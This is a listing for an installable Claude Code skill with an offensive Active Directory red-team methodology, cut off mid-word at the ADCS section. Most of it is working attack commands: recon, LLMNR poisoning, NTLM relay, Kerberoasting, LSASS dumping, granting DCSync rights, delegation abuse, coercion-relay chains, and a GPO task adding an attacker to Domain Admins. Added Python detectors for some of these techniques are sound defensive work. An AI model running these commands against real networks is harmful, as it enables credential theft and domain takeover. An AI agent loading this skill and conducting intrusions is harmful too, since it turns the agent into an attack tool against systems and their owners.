ClaudeWave skill listing: 2.3k repo stars, updated 1 month ago

offensive-active-directory

This Claude Code item documents offensive Active Directory attack methodology for red team engagements, covering reconnaissance techniques (BloodHound, PowerView, ADExplorer), credential harvesting (Kerberoasting, ASREProasting, LLMNR/NBT-NS poisoning, NTLM relay), privilege escalation, lateral movement, persistence mechanisms, forest trust attacks, and ADCS abuse with evasion tactics. Use when conducting authorized security assessments of on-premises Active Directory environments, hybrid deployments, or certificate services infrastructure.

Install in Claude Code:

```bash
git clone --depth 1 https://github.com/SnailSploit/Claude-Red /tmp/offensive-active-directory && cp -r /tmp/offensive-active-directory/Skills/active-directory/offensive-active-directory ~/.claude/skills/offensive-active-directory
```

Then open a new Claude Code session; the skill loads automatically.

SKILL.md

# Active Directory — Offensive Testing Methodology

## Quick Workflow

1. Recon AD structure offline (BloodHound, ADExplorer snapshot) — minimize live queries
2. Harvest creds via poisoning, Kerberoasting, ASREProast, or LSASS where allowed
3. Map attack paths to Domain Admin / Enterprise Admin / Tier 0
4. Execute path with lowest detection cost, validate at each hop
5. Establish persistence and document every action with timestamps

---

## Reconnaissance

### BloodHound Collection

```powershell
# SharpHound (C# collector) — most stealthy with throttling
SharpHound.exe -c All,GPOLocalGroup --Throttle 1000 --Jitter 30 --ZipFileName recon.zip

# Stealth collection (DC-only, avoids workstation noise)
SharpHound.exe -c DCOnly --Stealth
```

```bash
# BloodHound.py from Linux (no Windows host needed)
bloodhound-python -d corp.local -u user -p pass -ns 10.0.0.1 -c All
```

### PowerView (No Tool Drop)

```powershell
# Domain enumeration without binaries
$d = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
Get-DomainUser -SPN | Select samaccountname,serviceprincipalname
Get-DomainComputer -Unconstrained
Get-DomainGPO | ?{$_.gpcmachineextensionnames -match "Restricted Groups"}
Get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs |
  ?{$_.ActiveDirectoryRights -match 'WriteDacl|GenericAll|WriteOwner'}
```

### ADExplorer Offline

```
# Take snapshot from any low-priv user, analyze offline
ADExplorer.exe → File → Create Snapshot
# Convert to BloodHound format
ADExplorerSnapshot.py snapshot.dat -o output/
```

---

## Credential Harvesting

### LLMNR / NBT-NS / mDNS Poisoning

```bash
# Capture NetNTLMv2 hashes from broadcast resolution
responder -I eth0 -wrf
```

```powershell
# Inveigh (Windows-side, when you have a foothold)
Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -HTTP Y
```

Crack with hashcat mode 5600. If cracking fails, relay instead.

### NTLM Relay

```bash
# Identify relay targets (no SMB signing, LDAP signing not required)
nxc smb 10.0.0.0/24 --gen-relay-list relay-targets.txt

# Relay to LDAP/LDAPS for ACL abuse, ADCS for cert request
impacket-ntlmrelayx -tf relay-targets.txt -smb2support \
  --escalate-user attacker --delegate-access

# Relay to ADCS Web Enrollment (ESC8) — requires HTTP endpoint up
impacket-ntlmrelayx -t http://ca/certsrv/certfnsh.asp \
  --adcs --template DomainController
```

### Kerberoasting

```powershell
# Request TGS for all SPN-bearing accounts
Rubeus.exe kerberoast /outfile:tgs.txt /nowrap
# AES-only accounts (harder to crack but worth attempting)
Rubeus.exe kerberoast /aes /outfile:tgs_aes.txt
```

```bash
# Cross-platform from Linux
impacket-GetUserSPNs corp.local/user:pass -dc-ip 10.0.0.1 -request
hashcat -m 13100 tgs.txt rockyou.txt -r OneRuleToRuleThemAll.rule
```

### ASREProasting

```bash
# Find users with DONT_REQUIRE_PREAUTH set
impacket-GetNPUsers corp.local/ -usersfile users.txt -dc-ip 10.0.0.1 -no-pass
hashcat -m 18200 asrep.txt rockyou.txt
```

### LSASS / SAM Dumping

```cmd
:: Modern, AV-friendly: comsvcs.dll minidump
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <PID> C:\out.dmp full

:: Task Manager → lsass.exe → Create dump file (GUI route, no binary drop)

:: nanodump (handle duplication, no MiniDumpWriteDump)
nanodump.exe --pid <PID> -w lsass.dmp --valid
```

Parse with Mimikatz or pypykatz offline:

```bash
pypykatz lsa minidump lsass.dmp
```
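Whichever route above produces the dump, the dump itself reads lsass.exe memory through a handle that carries a read right, and that is what host telemetry can key on. The block below is an added example, not part of this skill: it flags Sysmon-style process-access and process-creation records for the patterns listed above; the records, the allowlist and the sample paths are constructed for the example, and only the field names follow Sysmon's.

```python
"""Added example (not from the skill): spot the LSASS dump routes listed above in
Sysmon-style records. Input is a constructed list of dicts; field names follow
Sysmon Event 10 (ProcessAccess) and Event 1 (ProcessCreate)."""
import re

PROCESS_VM_READ = 0x0010   # every memory dumper needs this right on the lsass handle
# Images that legitimately open lsass on a typical host; tune per environment.
ALLOWLIST = {r"c:\windows\system32\csrss.exe", r"c:\windows\system32\wininit.exe"}
# comsvcs.dll MiniDump by export name or by ordinal (#24), with or without the comma
COMSVCS_MINIDUMP = re.compile(r"comsvcs(\.dll)?\s*,?\s*(minidump|#24)\b", re.I)

def lsass_access_hits(events):
    """(SourceImage, GrantedAccess) for non-allowlisted readers of lsass.exe.
    Task Manager's 'Create dump file' shows up here as Taskmgr.exe; an open
    without VM_READ (e.g. 0x1400, query-only) is not a dump and is ignored."""
    hits = []
    for e in events:
        if e["EventID"] != 10 or not e["TargetImage"].lower().endswith(r"\lsass.exe"):
            continue
        granted = int(e["GrantedAccess"], 16)
        if granted & PROCESS_VM_READ and e["SourceImage"].lower() not in ALLOWLIST:
            hits.append((e["SourceImage"], hex(granted)))
    return hits

def minidump_cmdline_hits(events):
    """Process-creation command lines that invoke comsvcs.dll MiniDump."""
    return [e["CommandLine"] for e in events
            if e["EventID"] == 1 and COMSVCS_MINIDUMP.search(e["CommandLine"])]

LSASS = r"C:\Windows\System32\lsass.exe"
SAMPLE = [  # constructed records
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe", "TargetImage": LSASS, "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\Taskmgr.exe", "TargetImage": LSASS, "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Users\bob\tool.exe", "TargetImage": LSASS, "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Users\bob\tool.exe", "TargetImage": LSASS, "GrantedAccess": "0x1400"},
    {"EventID": 1, "CommandLine": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\out.dmp full"},
    {"EventID": 1, "CommandLine": r"rundll32.exe comsvcs.dll,#24 624 C:\t.dmp full"},
    {"EventID": 1, "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL"},
]

if __name__ == "__main__":
    print(lsass_access_hits(SAMPLE))
    print(minidump_cmdline_hits(SAMPLE))
```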

---

## Privilege Escalation Within AD

### ACL Abuse

| Right | Abuse |
|-------|-------|
| `GenericAll` / `GenericWrite` | Add SPN → Kerberoast; reset password; add member |
| `WriteDacl` | Grant yourself DCSync rights, then DCSync |
| `WriteOwner` | Take ownership → grant rights → exploit |
| `AllExtendedRights` (User) | Force password change |
| `AllExtendedRights` (Domain) | DCSync |
| `AddMember` | Add self to privileged group |
| `WriteSPN` | Set SPN, kerberoast target |

```powershell
# Targeted Kerberoast (write SPN, roast, remove SPN)
Set-DomainObject -Identity victim -Set @{serviceprincipalname='fake/SPN'}
Rubeus.exe kerberoast /user:victim
Set-DomainObject -Identity victim -Clear serviceprincipalname

# Grant DCSync via WriteDacl
Add-DomainObjectAcl -TargetIdentity 'DC=corp,DC=local' `
  -PrincipalIdentity attacker -Rights DCSync
```
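Both the Kerberoasting section above and the targeted-Kerberoast sequence in this block leave the same traces on a domain controller: a service-ticket request (event 4769) with RC4 encryption and, for the targeted case, a servicePrincipalName write (event 5136) shortly before it. The block below is an added example, not part of this skill; the event records are constructed, `OperationType` is simplified to the text 'Value Added', and the thresholds are this example's own.

```python
"""Added example (not from the skill): flag Kerberoasting in exported Security events.
Records are constructed dicts whose field names follow events 4769 and 5136."""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"                    # TicketEncryptionType that classic roasting requests
BURST_WINDOW = timedelta(minutes=5)
BURST_SPNS = 3                       # distinct RC4 service tickets per requester

def rc4_bursts(events):
    """Requesters pulling >= BURST_SPNS distinct RC4 tickets within BURST_WINDOW (computer accounts and krbtgt skipped)."""
    by_user = defaultdict(list)
    for e in events:
        svc = e.get("ServiceName", "")
        if (e["EventID"] == 4769 and e["TicketEncryptionType"] == RC4_HMAC
                and not svc.endswith("$") and svc.lower() != "krbtgt"):
            by_user[e["TargetUserName"]].append((datetime.fromisoformat(e["Time"]), svc))
    hits = {}
    for user, reqs in by_user.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):
            spns = {s for t, s in reqs[i:] if t - t0 <= BURST_WINDOW}
            if len(spns) >= BURST_SPNS:
                hits[user] = sorted(spns)
                break
    return hits

def targeted_roasts(events, window=timedelta(hours=1)):
    """5136 'Value Added' on servicePrincipalName, then a 4769 for that account: the write-SPN / roast sequence above."""
    hits = []
    for a in events:
        if (a["EventID"] != 5136 or a["OperationType"] != "Value Added"
                or a["AttributeLDAPDisplayName"] != "servicePrincipalName"):
            continue
        victim, t_add = a["ObjectDN"].split(",")[0].split("=", 1)[1].lower(), datetime.fromisoformat(a["Time"])
        for e in events:
            if (e["EventID"] == 4769 and e["ServiceName"].lower() == victim
                    and timedelta(0) <= datetime.fromisoformat(e["Time"]) - t_add <= window):
                hits.append((a["SubjectUserName"], victim, e["TargetUserName"]))
    return hits

T = "2024-05-01T10:0%d:00"  # constructed timestamps, one minute apart
SAMPLE = [  # jdoe pulls three RC4 tickets in three minutes; helpdesk1 adds an SPN, then roasts it
    {"EventID": 4769, "Time": T % 0, "TargetUserName": "jdoe", "ServiceName": "svc_sql", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "Time": T % 1, "TargetUserName": "jdoe", "ServiceName": "svc_web", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "Time": T % 2, "TargetUserName": "jdoe", "ServiceName": "svc_iis", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "Time": T % 2, "TargetUserName": "jdoe", "ServiceName": "WS01$", "TicketEncryptionType": "0x17"},
    {"EventID": 5136, "Time": T % 4, "SubjectUserName": "helpdesk1", "ObjectDN": "CN=svc_backup,OU=Service,DC=corp,DC=local", "AttributeLDAPDisplayName": "servicePrincipalName", "AttributeValue": "fake/SPN", "OperationType": "Value Added"},
    {"EventID": 4769, "Time": T % 5, "TargetUserName": "helpdesk1", "ServiceName": "svc_backup", "TicketEncryptionType": "0x17"},
]
```

The AES-only variant (`/aes` above) does not trip the RC4 rule, so pair it with a distinct-service-ticket threshold that ignores encryption type.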

### Kerberos Delegation

```powershell
# Find delegation
Get-DomainComputer -Unconstrained
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth

# Unconstrained → wait for / coerce DC auth, capture TGT
Rubeus.exe monitor /interval:5 /nowrap

# Constrained (S4U2self/S4U2proxy) — impersonate any user to allowed SPN
Rubeus.exe s4u /user:svc_acct /rc4:<hash> /impersonateuser:Administrator `
  /msdsspn:cifs/dc.corp.local /ptt

# Resource-Based Constrained Delegation (RBCD) — write msDS-AllowedToActOnBehalfOfOtherIdentity
# Requires GenericAll/GenericWrite on the target computer object
```
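The enumeration in this section and in the ASREProasting section has a defender-side equivalent: auditing an exported account list for the same flags before anyone else does. The block below is an added example, not part of this skill; the account records are constructed, the `userAccountControl` bit values are the standard ones, and the triage rules (skip disabled accounts, exempt DCs from the unconstrained check) are this example's own choices.

```python
"""Added example (not from the skill): triage an exported account list for the
conditions the ASREProasting and delegation sections hunt for. Input is a constructed
list of dicts keyed by LDAP attribute name; the flag values are the standard
userAccountControl bits."""
ACCOUNTDISABLE                 = 0x0000002
SERVER_TRUST_ACCOUNT           = 0x0002000   # domain controller computer account
TRUSTED_FOR_DELEGATION         = 0x0080000   # unconstrained delegation
DONT_REQ_PREAUTH               = 0x0400000   # AS-REP roastable
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000   # constrained delegation, protocol transition

def triage(accounts):
    """Return {sAMAccountName: [finding, ...]}; disabled accounts are skipped."""
    findings = {}
    for a in accounts:
        uac, name = a["userAccountControl"], a["sAMAccountName"]
        if uac & ACCOUNTDISABLE:
            continue
        issues = []
        if uac & DONT_REQ_PREAUTH:
            issues.append("AS-REP roastable: DONT_REQ_PREAUTH set")
        if uac & TRUSTED_FOR_DELEGATION and not uac & SERVER_TRUST_ACCOUNT:
            issues.append("unconstrained delegation on a non-DC")   # DCs hold it by design
        if uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
            targets = ", ".join(a.get("msDS-AllowedToDelegateTo", [])) or "(no targets listed)"
            issues.append("constrained delegation with protocol transition to " + targets)
        if not name.endswith("$") and a.get("servicePrincipalName"):
            who = "privileged (adminCount=1)" if a.get("adminCount") == 1 else "user"
            issues.append(f"Kerberoastable: SPN on {who} account")
        if issues:
            findings[name] = issues
    return findings

SAMPLE = [  # constructed export; userAccountControl as the integer LDAP returns
    {"sAMAccountName": "DC01$", "userAccountControl": 0x82000},        # DC: unconstrained is normal
    {"sAMAccountName": "SRV01$", "userAccountControl": 0x81000},       # member server, unconstrained
    {"sAMAccountName": "svc_legacy", "userAccountControl": 0x400200},  # pre-auth disabled
    {"sAMAccountName": "old_user", "userAccountControl": 0x400202},    # same flag, but account disabled
    {"sAMAccountName": "svc_sql", "userAccountControl": 0x200, "adminCount": 1,
     "servicePrincipalName": ["MSSQLSvc/db01.corp.local:1433"]},
    {"sAMAccountName": "svc_web", "userAccountControl": 0x1000200,
     "msDS-AllowedToDelegateTo": ["cifs/dc.corp.local"]},
]
```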

### Coercion Primitives

| Technique | Tool / RPC |
|-----------|-----------|
| PetitPotam | `MS-EFSRPC` (`EfsRpcOpenFileRaw`, `EfsRpcEncryptFileSrv`) |
| PrinterBug | `MS-RPRN` (`RpcRemoteFindFirstPrinterChangeNotificationEx`) |
| DFSCoerce | `MS-DFSNM` (`NetrDfsRemoveStdRoot`) |
| ShadowCoerce | `MS-FSRVP` |
| WebDAV | Search-and-replace UNC path embedded in any web fetch |

```bash
# Coerce + relay full chain
impacket-ntlmrelayx -t ldap://dc -smb2support --delegate-access &
PetitPotam.py -u low -p pass attacker-ip dc-ip
# Result: RBCD set, S4U → DA on coerced machine
```

### GPO Abuse

```powershell
# Find GPOs you can edit
Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs |
  ?{ $_.SecurityIdentifier -eq (Get-DomainUser current).objectsid `
     -and $_.ActiveDirectoryRights -match 'WriteProperty|WriteDacl' }

# SharpGPOAbuse — add scheduled task / immediate task to GPO
SharpGPOAbuse.exe --AddComputerTask --TaskName Update --Author NT\System `
  --Command cmd.exe --Arguments "/c net group 'Domain Admins' attacker /add /domain" `
  --GPOName "Workstation Policy"
```

---

## ADCS Abuse — ESC1 through ESC15

### Enumeration

```bash
certi
```